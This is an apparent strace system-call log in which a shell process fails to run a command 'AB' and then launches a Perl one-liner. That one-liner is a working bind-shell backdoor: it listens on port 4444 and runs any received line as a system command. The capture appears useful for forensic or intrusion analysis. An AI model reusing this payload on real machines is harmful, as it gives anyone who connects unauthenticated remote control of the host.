7963  07:21:12.938202 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7963  07:21:12.938219 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6d000

7963  07:21:12.938231 mmap2(0xb7d81000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d81000

7963  07:21:12.938246 mmap2(0xb7d83000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d83000

7963  07:21:12.938260 close(1)          = 0

7963  07:21:12.938287 munmap(0xb7f13000, 29913) = 0

7963  07:21:12.938304 open("/etc/ld.so.cache", O_RDONLY) = 1

7963  07:21:12.938317 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7963  07:21:12.938334 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f13000

7963  07:21:12.938344 close(1)          = 0

7963  07:21:12.938354 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.938368 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7963  07:21:12.938382 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7963  07:21:12.938472 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7963  07:21:12.938489 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d63000

7963  07:21:12.938501 mmap2(0xb7d6b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d6b000

7963  07:21:12.938517 close(1)          = 0

7963  07:21:12.938541 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7963  07:21:12.938583 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7963  07:21:12.938602 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7963  07:21:12.938706 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7963  07:21:12.938723 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d58000

7963  07:21:12.938735 mmap2(0xb7d61000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d61000

7963  07:21:12.938751 close(1)          = 0

7963  07:21:12.938773 munmap(0xb7f13000, 29913) = 0

7963  07:21:12.938788 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7963  07:21:12.938802 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7963  07:21:12.938814 _llseek(1, 0, [0], SEEK_CUR) = 0

7963  07:21:12.938826 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7963  07:21:12.938843 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f1a000

7963  07:21:12.938854 _llseek(1, 1624, [1624], SEEK_SET) = 0

7963  07:21:12.938869 munmap(0xb7f1a000, 1624) = 0

7963  07:21:12.938878 close(1)          = 0

7963  07:21:12.938907 getpgrp()         = 3831

7963  07:21:12.938918 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7963  07:21:12.938933 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7963  07:21:12.938949 brk(0x8101000)    = 0x8101000

7963  07:21:12.938980 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.938985 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.938985 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7963  07:21:12.938985 brk(0x8102000)    = 0x8102000

7963  07:21:12.938986 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7963  07:21:12.938986 stat64("/sbin/AB", 0xbf9ed048) = -1 ENOENT (No such file or directory)

7963  07:21:12.938986 stat64("/bin/AB", 0xbf9ed048) = -1 ENOENT (No such file or directory)

7963  07:21:12.938986 stat64("/usr/sbin/AB", 0xbf9ed048) = -1 ENOENT (No such file or directory)

7963  07:21:12.938986 stat64("/usr/bin/AB", 0xbf9ed048) = -1 ENOENT (No such file or directory)

7963  07:21:12.938987 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7963  07:21:12.938987 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d8e6f8) = 7964

7964  07:21:12.938987 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7964  07:21:12.939005 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7964  07:21:12.939019 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7964  07:21:12.939031 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7964  07:21:12.939046 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7964  07:21:12.939064 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7964  07:21:12.939077 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7964  07:21:12.939132 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7964  07:21:12.939156 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7964  07:21:12.939224 exit_group(127)   = ?

7963  07:21:12.945015 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:21:12.945114 waitpid(7963,  <unfinished ...>

7963  07:21:12.945172 <... rt_sigprocmask resumed> NULL, 8) = 0

7963  07:21:12.945206 --- SIGCHLD (Child exited) @ 0 (0) ---

7963  07:21:12.945236 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7964

7963  07:21:12.945273 waitpid(-1, 0xbf9eccc8, WNOHANG) = -1 ECHILD (No child processes)

7963  07:21:12.945297 sigreturn()       = ? (mask now [])

7963  07:21:12.945328 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7963  07:21:12.945343 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7963  07:21:12.945354 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7963  07:21:12.945366 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7963  07:21:12.945382 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7963  07:21:12.945394 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7963  07:21:12.945426 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7963  07:21:12.945445 stat64("/sbin/perl", 0xbf9ed078) = -1 ENOENT (No such file or directory)

7963  07:21:12.945457 stat64("/bin/perl", 0xbf9ed078) = -1 ENOENT (No such file or directory)

7963  07:21:12.945468 stat64("/usr/sbin/perl", 0xbf9ed078) = -1 ENOENT (No such file or directory)

7963  07:21:12.945479 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7963  07:21:12.945497 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7963  07:21:12.945521 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7963  07:21:12.945535 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d8e6f8) = 7965

7965  07:21:12.945608 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7965  07:21:12.945640 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7965  07:21:12.945652 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7965  07:21:12.945664 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7965  07:21:12.945678 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7965  07:21:12.945693 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7965  07:21:12.945706 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7965  07:21:12.945737 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7965  07:21:12.945823 brk(0)            = 0x8153000

7965  07:21:12.945843 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.945858 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f67000

7965  07:21:12.945873 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.945889 open("/etc/ld.so.cache", O_RDONLY) = 1

7965  07:21:12.945901 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7965  07:21:12.945917 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5f000

7965  07:21:12.945927 close(1)          = 0

7965  07:21:12.945938 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.945952 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7965  07:21:12.945966 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7965  07:21:12.946059 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7965  07:21:12.946106 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5b000

7965  07:21:12.946119 mmap2(0xb7f5d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f5d000

7965  07:21:12.946150 close(1)          = 0

7965  07:21:12.946161 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.946174 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7965  07:21:12.946188 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7965  07:21:12.946275 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7965  07:21:12.946291 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f36000

7965  07:21:12.946302 mmap2(0xb7f59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f59000

7965  07:21:12.946317 close(1)          = 0

7965  07:21:12.946328 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.946342 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7965  07:21:12.946355 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7965  07:21:12.946439 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7965  07:21:12.946455 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f35000

7965  07:21:12.946468 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1d000

7965  07:21:12.946479 mmap2(0xb7f31000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f31000

7965  07:21:12.946493 mmap2(0xb7f33000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f33000

7965  07:21:12.946509 close(1)          = 0

7965  07:21:12.946521 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7965  07:21:12.946534 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7965  07:21:12.946547 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7965  07:21:12.946675 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7965  07:21:12.946693 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dce000

